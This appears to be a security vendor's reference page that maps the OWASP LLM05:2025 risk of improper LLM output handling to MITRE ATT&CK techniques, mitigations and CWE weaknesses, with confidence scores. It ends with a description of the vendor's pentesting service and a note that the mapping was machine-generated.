OWASP_LLM_TOP10LLM05:2025voice-validated
OWASP_LLM_TOP10 LLM05: LLM05:2025
OWASP_LLM_TOP10
AL
Founder at SQUR · last verified 2026-06-20
Regulation text
Improper output handling occurs when LLM-generated output is passed downstream to other systems without validation, sanitisation, or context-aware escaping. The output can enable XSS, CSRF, SSRF, privilege escalation, or remote code execution in the downstream components — particularly when the LLM output is used in dynamic queries, executed as code, or rendered in browser/email/document contexts.
ATT&CK techniques this article tests · 15
| Technique | Why it maps | Confidence |
|---|---|---|
| T1190 | 1. Improper LLM output handling can lead to exploitation of public-facing applications, enabling initial access through vulnerabilities like XSS or RCE in downstream components. | 90% |
| T1203 | 2. Malicious LLM output, when rendered in browser contexts without validation, directly facilitates client-side execution via Cross-Site Scripting (XSS). | 90% |
| T1059 | 3. LLM output executed as code in downstream systems, due to lack of sanitisation, enables command and scripting interpreter execution, leading to Remote Code Execution (RCE). | 90% |
| T1068 | 4. Improperly handled LLM output can be crafted to exploit vulnerabilities in downstream components, leading to privilege escalation within the system. | 80% |
| T1027 | 5. Attackers can use LLM output to obfuscate malicious payloads, bypassing security controls when the output is not validated or sanitised before downstream processing. | 80% |
| T1003 | 6. Successful Remote Code Execution (RCE) via improper LLM output handling can enable an attacker to dump OS credentials from the compromised system. | 70% |
| T1056 | 7. Cross-Site Scripting (XSS) enabled by improper LLM output can facilitate input capture, such as keylogging or form data theft, from affected users. | 80% |
| T1083 | 8. Remote Code Execution (RCE) resulting from improper LLM output allows attackers to perform file and directory discovery on the compromised system. | 70% |
| T1021 | 9. Compromise of a downstream system via improper LLM output can enable lateral movement by utilizing remote services to access other systems. | 70% |
| T1119 | 10. Remote Code Execution (RCE) achieved through improper LLM output handling can be used to automate the collection of sensitive data from the system. | 70% |
| T1071 | 11. RCE facilitated by improper LLM output can establish Command and Control (C2) communication over common application layer protocols, blending with legitimate traffic. | 80% |
| T1041 | 12. Data exfiltration can occur over the established C2 channel after a system compromise due to improper LLM output handling. | 80% |
| T1490 | 13. Remote Code Execution (RCE) resulting from improper LLM output can be used to inhibit system recovery mechanisms, such as deleting backups or shadow copies. | 70% |
| T1486 | 14. An attacker gaining RCE via improper LLM output could encrypt data for impact, leading to ransomware scenarios. | 70% |
| T1499 | 15. Improper LLM output leading to RCE can be used to cause an Endpoint Denial of Service by crashing or disabling critical services on the compromised system. | 70% |
Defending mitigations · 6
| Mitigation | What it does | Confidence |
|---|---|---|
| M1038 | 1. Strict encoding of all LLM-generated output before passing it to downstream systems prevents injection attacks like XSS and RCE by neutralizing special characters. | 100% |
| M1040 | 2. Data validation must be applied to LLM output, treating it as untrusted input for downstream components, ensuring it conforms to expected formats and content policies. | 100% |
| M1028 | 3. Application isolation and sandboxing of downstream components processing LLM output limits the blast radius of any successful exploitation, containing potential damage. | 90% |
| M1035 | 4. Limiting access to resources for downstream systems that process LLM output reduces the impact of privilege escalation or RCE if output handling fails. | 90% |
| M1047 | 5. Comprehensive auditing and logging of LLM output processing and downstream system interactions helps detect anomalous behavior indicative of exploitation. | 80% |
| M1030 | 6. Network segmentation isolates systems that process LLM output, preventing lateral movement and limiting the scope of attacks originating from improper output handling. | 80% |
Underlying weaknesses · 7
| CWE | Why it persists | Confidence |
|---|---|---|
| CWE-79 | 1. Improper neutralization of LLM output during web page generation directly causes Cross-site Scripting (XSS) vulnerabilities, as specified in the control text. | 100% |
| CWE-74 | 2. Failure to neutralize special elements in LLM output used by downstream components leads to various injection attacks, including RCE and SSRF. | 100% |
| CWE-94 | 3. Improper control over the generation of code, specifically when LLM output is executed as code, directly results in code injection vulnerabilities. | 100% |
| CWE-918 | 4. Lack of validation and sanitisation of LLM output can enable Server-Side Request Forgery (SSRF) if the output is used in dynamic queries to internal resources. | 100% |
| CWE-352 | 5. Improper output handling can facilitate Cross-Site Request Forgery (CSRF) attacks, particularly when LLM output is rendered in browser contexts without proper defenses. | 100% |
| CWE-284 | 6. Privilege escalation, as mentioned in the control, is a direct consequence of improper access control, often exploited via vulnerabilities stemming from improper output handling. | 90% |
| CWE-20 | 7. Improper input validation, applied to LLM output as it enters downstream systems, is a fundamental weakness allowing various attacks described in the control. | 90% |
What SQUR Covers
Web application + API pentesting for OWASP Top 10, business logic flaws, authentication bypass, injection attacks, and other application-layer vulnerabilities. €1,995 per scan, 24-hour turnaround, EU-only data.
What SQUR Does Not Cover
Internal network pentesting, endpoint security testing, physical security assessments, social engineering, or ICT third-party concentration risk reviews. Engage a complementary provider for those scope items.
Provenance
Mapped Q2.2026 using gemini-2.5-flash · €0.0178 compute · voice-rubric self-validated